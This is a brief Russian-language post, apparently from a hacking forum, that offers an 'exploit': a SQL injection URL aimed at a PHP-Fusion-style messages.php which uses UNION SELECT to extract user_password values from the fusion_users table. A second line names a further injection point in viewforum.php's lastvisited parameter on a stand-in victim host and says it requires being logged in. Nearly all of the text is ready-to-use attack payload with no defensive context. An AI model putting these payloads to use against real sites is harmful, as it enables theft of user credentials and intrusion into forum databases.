Вот сплоит: --- http://127.0.0.1/php-files/messages.php?folder=inbox&show=H'%20union%20select%201,1,1,user_password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1+from+fusion_users/* ---
http://www.victim.ru/forum/viewforum.php?forum_id=1&lastvisited='sql-inj аналогично залогиненый только пошол Медведевскую проверять
